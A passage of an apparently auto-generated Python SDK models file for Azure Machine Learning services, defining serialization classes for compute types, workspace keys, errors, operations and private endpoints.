'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'DatabricksProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["DatabricksProperties"] = None,
**kwargs
):
super(Databricks, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'Databricks' # type: str
self.properties = properties
class DatabricksComputeSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on Databricks.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param databricks_access_token: access token for databricks account.
:type databricks_access_token: str
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'databricks_access_token': {'key': 'databricksAccessToken', 'type': 'str'},
}
def __init__(
self,
*,
databricks_access_token: Optional[str] = None,
**kwargs
):
super(DatabricksComputeSecrets, self).__init__(**kwargs)
self.compute_type = 'Databricks' # type: str
self.databricks_access_token = databricks_access_token
class DatabricksProperties(msrest.serialization.Model):
"""DatabricksProperties.
:param databricks_access_token: Databricks access token.
:type databricks_access_token: str
"""
_attribute_map = {
'databricks_access_token': {'key': 'databricksAccessToken', 'type': 'str'},
}
def __init__(
self,
*,
databricks_access_token: Optional[str] = None,
**kwargs
):
super(DatabricksProperties, self).__init__(**kwargs)
self.databricks_access_token = databricks_access_token
class DataFactory(Compute):
"""A DataFactory compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
**kwargs
):
super(DataFactory, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'DataFactory' # type: str
class DataLakeAnalytics(Compute):
"""A DataLakeAnalytics compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.DataLakeAnalyticsProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'DataLakeAnalyticsProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["DataLakeAnalyticsProperties"] = None,
**kwargs
):
super(DataLakeAnalytics, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'DataLakeAnalytics' # type: str
self.properties = properties
class DataLakeAnalyticsProperties(msrest.serialization.Model):
"""DataLakeAnalyticsProperties.
:param data_lake_store_account_name: DataLake Store Account Name.
:type data_lake_store_account_name: str
"""
_attribute_map = {
'data_lake_store_account_name': {'key': 'dataLakeStoreAccountName', 'type': 'str'},
}
def __init__(
self,
*,
data_lake_store_account_name: Optional[str] = None,
**kwargs
):
super(DataLakeAnalyticsProperties, self).__init__(**kwargs)
self.data_lake_store_account_name = data_lake_store_account_name
class EncryptionProperty(msrest.serialization.Model):
"""EncryptionProperty.
All required parameters must be populated in order to send to Azure.
:param status: Required. Indicates whether or not the encryption is enabled for the workspace.
Possible values include: "Enabled", "Disabled".
:type status: str or ~azure.mgmt.machinelearningservices.models.EncryptionStatus
:param key_vault_properties: Required. Customer Key vault properties.
:type key_vault_properties: ~azure.mgmt.machinelearningservices.models.KeyVaultProperties
"""
_validation = {
'status': {'required': True},
'key_vault_properties': {'required': True},
}
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'key_vault_properties': {'key': 'keyVaultProperties', 'type': 'KeyVaultProperties'},
}
def __init__(
self,
*,
status: Union[str, "EncryptionStatus"],
key_vault_properties: "KeyVaultProperties",
**kwargs
):
super(EncryptionProperty, self).__init__(**kwargs)
self.status = status
self.key_vault_properties = key_vault_properties
class ErrorDetail(msrest.serialization.Model):
"""Error detail information.
All required parameters must be populated in order to send to Azure.
:param code: Required. Error code.
:type code: str
:param message: Required. Error message.
:type message: str
"""
_validation = {
'code': {'required': True},
'message': {'required': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
*,
code: str,
message: str,
**kwargs
):
super(ErrorDetail, self).__init__(**kwargs)
self.code = code
self.message = message
class ErrorResponse(msrest.serialization.Model):
"""Error response information.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: Error code.
:vartype code: str
:ivar message: Error message.
:vartype message: str
:ivar details: An array of error detail objects.
:vartype details: list[~azure.mgmt.machinelearningservices.models.ErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
'details': {'key': 'details', 'type': '[ErrorDetail]'},
}
def __init__(
self,
**kwargs
):
super(ErrorResponse, self).__init__(**kwargs)
self.code = None
self.message = None
self.details = None
class EstimatedVMPrice(msrest.serialization.Model):
"""The estimated price info for using a VM of a particular OS type, tier, etc.
All required parameters must be populated in order to send to Azure.
:param retail_price: Required. The price charged for using the VM.
:type retail_price: float
:param os_type: Required. Operating system type used by the VM. Possible values include:
"Linux", "Windows".
:type os_type: str or ~azure.mgmt.machinelearningservices.models.VMPriceOSType
:param vm_tier: Required. The type of the VM. Possible values include: "Standard",
"LowPriority", "Spot".
:type vm_tier: str or ~azure.mgmt.machinelearningservices.models.VMTier
"""
_validation = {
'retail_price': {'required': True},
'os_type': {'required': True},
'vm_tier': {'required': True},
}
_attribute_map = {
'retail_price': {'key': 'retailPrice', 'type': 'float'},
'os_type': {'key': 'osType', 'type': 'str'},
'vm_tier': {'key': 'vmTier', 'type': 'str'},
}
def __init__(
self,
*,
retail_price: float,
os_type: Union[str, "VMPriceOSType"],
vm_tier: Union[str, "VMTier"],
**kwargs
):
super(EstimatedVMPrice, self).__init__(**kwargs)
self.retail_price = retail_price
self.os_type = os_type
self.vm_tier = vm_tier
class EstimatedVMPrices(msrest.serialization.Model):
"""The estimated price info for using a VM.
All required parameters must be populated in order to send to Azure.
:param billing_currency: Required. Three lettered code specifying the currency of the VM price.
Example: USD. Possible values include: "USD".
:type billing_currency: str or ~azure.mgmt.machinelearningservices.models.BillingCurrency
:param unit_of_measure: Required. The unit of time measurement for the specified VM price.
Example: OneHour. Possible values include: "OneHour".
:type unit_of_measure: str or ~azure.mgmt.machinelearningservices.models.UnitOfMeasure
:param values: Required. The list of estimated prices for using a VM of a particular OS type,
tier, etc.
:type values: list[~azure.mgmt.machinelearningservices.models.EstimatedVMPrice]
"""
_validation = {
'billing_currency': {'required': True},
'unit_of_measure': {'required': True},
'values': {'required': True},
}
_attribute_map = {
'billing_currency': {'key': 'billingCurrency', 'type': 'str'},
'unit_of_measure': {'key': 'unitOfMeasure', 'type': 'str'},
'values': {'key': 'values', 'type': '[EstimatedVMPrice]'},
}
def __init__(
self,
*,
billing_currency: Union[str, "BillingCurrency"],
unit_of_measure: Union[str, "UnitOfMeasure"],
values: List["EstimatedVMPrice"],
**kwargs
):
super(EstimatedVMPrices, self).__init__(**kwargs)
self.billing_currency = billing_currency
self.unit_of_measure = unit_of_measure
self.values = values
class HDInsight(Compute):
"""A HDInsight compute.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.HDInsightProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'HDInsightProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["HDInsightProperties"] = None,
**kwargs
):
super(HDInsight, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'HDInsight' # type: str
self.properties = properties
class HDInsightProperties(msrest.serialization.Model):
"""HDInsightProperties.
:param ssh_port: Port open for ssh connections on the master node of the cluster.
:type ssh_port: int
:param address: Public IP address of the master node of the cluster.
:type address: str
:param administrator_account: Admin credentials for master node of the cluster.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_attribute_map = {
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'address': {'key': 'address', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
ssh_port: Optional[int] = None,
address: Optional[str] = None,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(HDInsightProperties, self).__init__(**kwargs)
self.ssh_port = ssh_port
self.address = address
self.administrator_account = administrator_account
class Identity(msrest.serialization.Model):
"""Identity for the resource.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar principal_id: The principal ID of resource identity.
:vartype principal_id: str
:ivar tenant_id: The tenant ID of resource.
:vartype tenant_id: str
:param type: Required. The identity type. Possible values include: "SystemAssigned",
"UserAssigned", "SystemAssigned,UserAssigned", "None".
:type type: str or ~azure.mgmt.machinelearningservices.models.ResourceIdentityType
:param user_assigned_identities: The list of user identities associated with resource. The user
identity dictionary key references will be ARM resource ids in the form:
'/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ManagedIdentity/userAssignedIdentities/{identityName}'.
:type user_assigned_identities: dict[str,
~azure.mgmt.machinelearningservices.models.ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties]
"""
_validation = {
'principal_id': {'readonly': True},
'tenant_id': {'readonly': True},
'type': {'required': True},
}
_attribute_map = {
'principal_id': {'key': 'principalId', 'type': 'str'},
'tenant_id': {'key': 'tenantId', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'user_assigned_identities': {'key': 'userAssignedIdentities', 'type': '{ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties}'},
}
def __init__(
self,
*,
type: Union[str, "ResourceIdentityType"],
user_assigned_identities: Optional[Dict[str, "ComponentsSgqdofSchemasIdentityPropertiesUserassignedidentitiesAdditionalproperties"]] = None,
**kwargs
):
super(Identity, self).__init__(**kwargs)
self.principal_id = None
self.tenant_id = None
self.type = type
self.user_assigned_identities = user_assigned_identities
class KeyVaultProperties(msrest.serialization.Model):
"""KeyVaultProperties.
All required parameters must be populated in order to send to Azure.
:param key_vault_arm_id: Required. The ArmId of the keyVault where the customer owned
encryption key is present.
:type key_vault_arm_id: str
:param key_identifier: Required. Key vault uri to access the encryption key.
:type key_identifier: str
:param identity_client_id: For future use - The client id of the identity which will be used to
access key vault.
:type identity_client_id: str
"""
_validation = {
'key_vault_arm_id': {'required': True},
'key_identifier': {'required': True},
}
_attribute_map = {
'key_vault_arm_id': {'key': 'keyVaultArmId', 'type': 'str'},
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'identity_client_id': {'key': 'identityClientId', 'type': 'str'},
}
def __init__(
self,
*,
key_vault_arm_id: str,
key_identifier: str,
identity_client_id: Optional[str] = None,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_vault_arm_id = key_vault_arm_id
self.key_identifier = key_identifier
self.identity_client_id = identity_client_id
class ListAmlUserFeatureResult(msrest.serialization.Model):
"""The List Aml user feature operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of AML user facing features.
:vartype value: list[~azure.mgmt.machinelearningservices.models.AmlUserFeature]
:ivar next_link: The URI to fetch the next page of AML user features information. Call
ListNext() with this to fetch the next page of AML user features information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[AmlUserFeature]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListAmlUserFeatureResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class ListUsagesResult(msrest.serialization.Model):
"""The List Usages operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of AML resource usages.
:vartype value: list[~azure.mgmt.machinelearningservices.models.Usage]
:ivar next_link: The URI to fetch the next page of AML resource usage information. Call
ListNext() with this to fetch the next page of AML resource usage information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[Usage]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListUsagesResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class ListWorkspaceKeysResult(msrest.serialization.Model):
"""ListWorkspaceKeysResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar user_storage_key:
:vartype user_storage_key: str
:ivar user_storage_resource_id:
:vartype user_storage_resource_id: str
:ivar app_insights_instrumentation_key:
:vartype app_insights_instrumentation_key: str
:ivar container_registry_credentials:
:vartype container_registry_credentials:
~azure.mgmt.machinelearningservices.models.RegistryListCredentialsResult
:param notebook_access_keys:
:type notebook_access_keys:
~azure.mgmt.machinelearningservices.models.NotebookListCredentialsResult
"""
_validation = {
'user_storage_key': {'readonly': True},
'user_storage_resource_id': {'readonly': True},
'app_insights_instrumentation_key': {'readonly': True},
'container_registry_credentials': {'readonly': True},
}
_attribute_map = {
'user_storage_key': {'key': 'userStorageKey', 'type': 'str'},
'user_storage_resource_id': {'key': 'userStorageResourceId', 'type': 'str'},
'app_insights_instrumentation_key': {'key': 'appInsightsInstrumentationKey', 'type': 'str'},
'container_registry_credentials': {'key': 'containerRegistryCredentials', 'type': 'RegistryListCredentialsResult'},
'notebook_access_keys': {'key': 'notebookAccessKeys', 'type': 'NotebookListCredentialsResult'},
}
def __init__(
self,
*,
notebook_access_keys: Optional["NotebookListCredentialsResult"] = None,
**kwargs
):
super(ListWorkspaceKeysResult, self).__init__(**kwargs)
self.user_storage_key = None
self.user_storage_resource_id = None
self.app_insights_instrumentation_key = None
self.container_registry_credentials = None
self.notebook_access_keys = notebook_access_keys
class ListWorkspaceQuotas(msrest.serialization.Model):
"""The List WorkspaceQuotasByVMFamily operation response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of Workspace Quotas by VM Family.
:vartype value: list[~azure.mgmt.machinelearningservices.models.ResourceQuota]
:ivar next_link: The URI to fetch the next page of workspace quota information by VM Family.
Call ListNext() with this to fetch the next page of Workspace Quota information.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[ResourceQuota]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ListWorkspaceQuotas, self).__init__(**kwargs)
self.value = None
self.next_link = None
class MachineLearningServiceError(msrest.serialization.Model):
"""Wrapper for error response to follow ARM guidelines.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar error: The error response.
:vartype error: ~azure.mgmt.machinelearningservices.models.ErrorResponse
"""
_validation = {
'error': {'readonly': True},
}
_attribute_map = {
'error': {'key': 'error', 'type': 'ErrorResponse'},
}
def __init__(
self,
**kwargs
):
super(MachineLearningServiceError, self).__init__(**kwargs)
self.error = None
class NodeStateCounts(msrest.serialization.Model):
"""Counts of various compute node states on the amlCompute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar idle_node_count: Number of compute nodes in idle state.
:vartype idle_node_count: int
:ivar running_node_count: Number of compute nodes which are running jobs.
:vartype running_node_count: int
:ivar preparing_node_count: Number of compute nodes which are being prepared.
:vartype preparing_node_count: int
:ivar unusable_node_count: Number of compute nodes which are in unusable state.
:vartype unusable_node_count: int
:ivar leaving_node_count: Number of compute nodes which are leaving the amlCompute.
:vartype leaving_node_count: int
:ivar preempted_node_count: Number of compute nodes which are in preempted state.
:vartype preempted_node_count: int
"""
_validation = {
'idle_node_count': {'readonly': True},
'running_node_count': {'readonly': True},
'preparing_node_count': {'readonly': True},
'unusable_node_count': {'readonly': True},
'leaving_node_count': {'readonly': True},
'preempted_node_count': {'readonly': True},
}
_attribute_map = {
'idle_node_count': {'key': 'idleNodeCount', 'type': 'int'},
'running_node_count': {'key': 'runningNodeCount', 'type': 'int'},
'preparing_node_count': {'key': 'preparingNodeCount', 'type': 'int'},
'unusable_node_count': {'key': 'unusableNodeCount', 'type': 'int'},
'leaving_node_count': {'key': 'leavingNodeCount', 'type': 'int'},
'preempted_node_count': {'key': 'preemptedNodeCount', 'type': 'int'},
}
def __init__(
self,
**kwargs
):
super(NodeStateCounts, self).__init__(**kwargs)
self.idle_node_count = None
self.running_node_count = None
self.preparing_node_count = None
self.unusable_node_count = None
self.leaving_node_count = None
self.preempted_node_count = None
class NotebookListCredentialsResult(msrest.serialization.Model):
"""NotebookListCredentialsResult.
:param primary_access_key:
:type primary_access_key: str
:param secondary_access_key:
:type secondary_access_key: str
"""
_attribute_map = {
'primary_access_key': {'key': 'primaryAccessKey', 'type': 'str'},
'secondary_access_key': {'key': 'secondaryAccessKey', 'type': 'str'},
}
def __init__(
self,
*,
primary_access_key: Optional[str] = None,
secondary_access_key: Optional[str] = None,
**kwargs
):
super(NotebookListCredentialsResult, self).__init__(**kwargs)
self.primary_access_key = primary_access_key
self.secondary_access_key = secondary_access_key
class NotebookPreparationError(msrest.serialization.Model):
"""NotebookPreparationError.
:param error_message:
:type error_message: str
:param status_code:
:type status_code: int
"""
_attribute_map = {
'error_message': {'key': 'errorMessage', 'type': 'str'},
'status_code': {'key': 'statusCode', 'type': 'int'},
}
def __init__(
self,
*,
error_message: Optional[str] = None,
status_code: Optional[int] = None,
**kwargs
):
super(NotebookPreparationError, self).__init__(**kwargs)
self.error_message = error_message
self.status_code = status_code
class NotebookResourceInfo(msrest.serialization.Model):
"""NotebookResourceInfo.
:param fqdn:
:type fqdn: str
:param resource_id: the data plane resourceId that used to initialize notebook component.
:type resource_id: str
:param notebook_preparation_error: The error that occurs when preparing notebook.
:type notebook_preparation_error:
~azure.mgmt.machinelearningservices.models.NotebookPreparationError
"""
_attribute_map = {
'fqdn': {'key': 'fqdn', 'type': 'str'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'notebook_preparation_error': {'key': 'notebookPreparationError', 'type': 'NotebookPreparationError'},
}
def __init__(
self,
*,
fqdn: Optional[str] = None,
resource_id: Optional[str] = None,
notebook_preparation_error: Optional["NotebookPreparationError"] = None,
**kwargs
):
super(NotebookResourceInfo, self).__init__(**kwargs)
self.fqdn = fqdn
self.resource_id = resource_id
self.notebook_preparation_error = notebook_preparation_error
class Operation(msrest.serialization.Model):
"""Azure Machine Learning workspace REST API operation.
:param name: Operation name: {provider}/{resource}/{operation}.
:type name: str
:param display: Display name of operation.
:type display: ~azure.mgmt.machinelearningservices.models.OperationDisplay
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
}
def __init__(
self,
*,
name: Optional[str] = None,
display: Optional["OperationDisplay"] = None,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = name
self.display = display
class OperationDisplay(msrest.serialization.Model):
"""Display name of operation.
:param provider: The resource provider name: Microsoft.MachineLearningExperimentation.
:type provider: str
:param resource: The resource on which the operation is performed.
:type resource: str
:param operation: The operation that users can perform.
:type operation: str
:param description: The description for the operation.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
*,
provider: Optional[str] = None,
resource: Optional[str] = None,
operation: Optional[str] = None,
description: Optional[str] = None,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = provider
self.resource = resource
self.operation = operation
self.description = description
class OperationListResult(msrest.serialization.Model):
"""An array of operations supported by the resource provider.
:param value: List of AML workspace operations supported by the AML workspace resource
provider.
:type value: list[~azure.mgmt.machinelearningservices.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
*,
value: Optional[List["Operation"]] = None,
**kwargs
):
super(OperationListResult, self).__init__(**kwargs)
self.value = value
class PaginatedComputeResourcesList(msrest.serialization.Model):
"""Paginated list of Machine Learning compute objects wrapped in ARM resource envelope.
:param value: An array of Machine Learning compute objects wrapped in ARM resource envelope.
:type value: list[~azure.mgmt.machinelearningservices.models.ComputeResource]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[ComputeResource]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["ComputeResource"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedComputeResourcesList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class PaginatedWorkspaceConnectionsList(msrest.serialization.Model):
"""Paginated list of Workspace connection objects.
:param value: An array of Workspace connection objects.
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceConnection]
:param next_link: A continuation link (absolute URI) to the next page of results in the list.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceConnection]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceConnection"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(PaginatedWorkspaceConnectionsList, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class Password(msrest.serialization.Model):
"""Password.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name:
:vartype name: str
:ivar value:
:vartype value: str
"""
_validation = {
'name': {'readonly': True},
'value': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Password, self).__init__(**kwargs)
self.name = None
self.value = None
class PrivateEndpoint(msrest.serialization.Model):
"""The Private Endpoint resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: The ARM identifier for Private Endpoint.
:vartype id: str
"""
_validation = {
'id': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PrivateEndpoint, self).__init__(**kwargs)
self.id = None
class PrivateEndpointConnection(msrest.serialization.Model):
"""The Private Endpoint Connection resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: ResourceId of the private endpoint connection.
:vartype id: str
:ivar name: Friendly name of the private endpoint connection.
:vartype name: str
:ivar type: Resource type of private endpoint connection.
:vartype type: str
:param private_endpoint: The resource of private end point.
:type private_endpoint: ~azure.mgmt.machinelearningservices.models.PrivateEndpoint
:param private_link_service_connection_state: A collection of information about the state of
the connection between service consumer and provider.
:type private_link_service_connection_state:
~azure.mgmt.machinelearningservices.models.PrivateLinkServiceConnectionState
:ivar provisioning_state: The provisioning state of the private endpoint connection resource.
Possible values include: "Succeeded", "Creating", "Deleting", "Failed".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointConnectionProvisioningState
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'provisioning_state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'private_endpoint': {'key': 'properties.privateEndpoint', 'type': 'PrivateEndpoint'},
